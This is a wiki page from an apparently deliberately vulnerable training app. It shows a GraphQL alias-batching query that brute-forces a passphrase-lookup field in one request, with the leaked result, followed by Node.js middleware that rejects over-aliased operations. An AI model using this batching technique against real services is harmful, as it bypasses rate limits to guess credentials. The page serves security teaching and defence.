GraphQL Batching Brute Force - snoopysecurity/dvws-node GitHub Wiki

Details

GraphQL supports batched queries: a single operation can select the same root field many times under different aliases, so many guesses travel in one HTTP request. Because WAF rules and rate limits usually count requests rather than fields, this feature can be abused to bypass web application firewalls and conduct denial of service attacks.

Technical Details

The getPassphrase query can be brute forced to find the passphrases of all users: each alias in the batch below submits a different reminder guess, and the server evaluates every one of them in a single request.

query Query {
  first: getPassphrase(reminder: "t") {
    passphrase,
    reminder
  }
  second: getPassphrase(reminder: "te") {
    passphrase,
    reminder
  }
  third: getPassphrase(reminder: "test") {
    passphrase,
    reminder
  }
}

Result:

{
  "data": {
    "first": null,
    "second": null,
    "third": {
      "passphrase": "397a363a383a3180496e6d3371714a7c",
      "reminder": "test"
    }
  }
}
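One server-side mitigation is to count root fields before the operation reaches the resolvers and refuse operations that alias the same field too many times. The Node.js code below is an added example, not part of dvws-node or this wiki page; it assumes an Express-style handler receives the operation text in req.body.query, and the function names, the limits in DEFAULT_LIMITS and the sample queries are chosen here for illustration. It uses a simplified scanner rather than a full GraphQL parser; a production deployment should walk the AST returned by parse() from the graphql package instead.

```javascript
// Added example (not dvws-node's own code): reject over-batched GraphQL
// operations such as the aliased getPassphrase query shown above.
// Simplified scanner for illustration; use the graphql package's AST in production.

const DEFAULT_LIMITS = { maxRootFields: 5, maxPerField: 2 }; // limits are assumptions

// Replace string literals (including """block""" strings) with "" so that
// braces and parentheses inside them do not confuse the depth tracking.
function stripStrings(src) {
  return src.replace(/"""[\s\S]*?"""|"(?:[^"\\]|\\.)*"/g, '""');
}

// Collect the "field head" text of each root-level selection: the part of a
// root field before its own `{ ... }` sub-selection. Argument lists are
// dropped entirely, so commas and object literals inside them are ignored.
function rootFieldSegments(src) {
  const segments = [];
  let depth = 0, paren = 0, current = '';
  for (const ch of stripStrings(src)) {
    if (ch === '(') { paren++; continue; }
    if (ch === ')') { paren--; continue; }
    if (paren > 0) continue;                       // inside an argument list
    if (ch === '{') {
      if (depth === 1) { segments.push(current); current = ''; }
      depth++;
      continue;
    }
    if (ch === '}') {
      if (depth === 1) { segments.push(current); current = ''; }
      depth--;
      continue;
    }
    if (depth === 1) current += ch;                // only root-level text is kept
  }
  return segments;
}

const IDENT = '[_A-Za-z][_0-9A-Za-z]*';

// Return every root field as { alias, name }; alias defaults to the name.
function rootFields(src) {
  const fields = [];
  const re = new RegExp(`(?:(${IDENT})\\s*:\\s*)?(${IDENT})`, 'g');
  for (const seg of rootFieldSegments(src)) {
    const cleaned = seg
      .replace(/\.\.\.\s*(on\s+[_A-Za-z]\w*|[_A-Za-z]\w*)?/g, ' ') // fragment spreads / inline fragments
      .replace(/@[_A-Za-z]\w*/g, ' ');                             // directives (args already dropped)
    let m;
    re.lastIndex = 0;
    while ((m = re.exec(cleaned)) !== null) {
      fields.push({ alias: m[1] || m[2], name: m[2] });
    }
  }
  return fields;
}

// Policy check: total root fields and repetitions of one field via aliases.
function checkBatchLimit(src, limits = DEFAULT_LIMITS) {
  const fields = rootFields(src);
  const perField = {};
  for (const f of fields) perField[f.name] = (perField[f.name] || 0) + 1;
  const violations = [];
  if (fields.length > limits.maxRootFields) {
    violations.push(`operation selects ${fields.length} root fields (limit ${limits.maxRootFields})`);
  }
  for (const [name, n] of Object.entries(perField)) {
    if (n > limits.maxPerField) {
      violations.push(`field "${name}" selected ${n} times via aliases (limit ${limits.maxPerField})`);
    }
  }
  return { ok: violations.length === 0, rootFieldCount: fields.length, perField, violations };
}

// Express-style wiring (assumed, shown for illustration):
//   app.use('/graphql', (req, res, next) => {
//     const verdict = checkBatchLimit(req.body.query || '');
//     if (!verdict.ok) {
//       return res.status(400).json({ errors: verdict.violations.map(message => ({ message })) });
//     }
//     next();
//   });

// Constructed sample: the batched query from this page, rejected by the check.
const BATCHED_QUERY = `query Query {
  first: getPassphrase(reminder: "t") { passphrase reminder }
  second: getPassphrase(reminder: "te") { passphrase reminder }
  third: getPassphrase(reminder: "test") { passphrase reminder }
}`;

console.log(checkBatchLimit(BATCHED_QUERY));   // ok: false, getPassphrase aliased 3 times
console.log(checkBatchLimit('{ me { id } }'));  // ok: true, a single root field
```

The per-field limit is the one that matters for this page: a legitimate client rarely needs the same root field more than once or twice per operation, while a brute-force batch repeats it for every guess. Keep maxRootFields generous enough for real multi-field dashboards and pair the check with per-resolver rate limiting, since the batch count alone says nothing about how many requests a client sends over time.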

References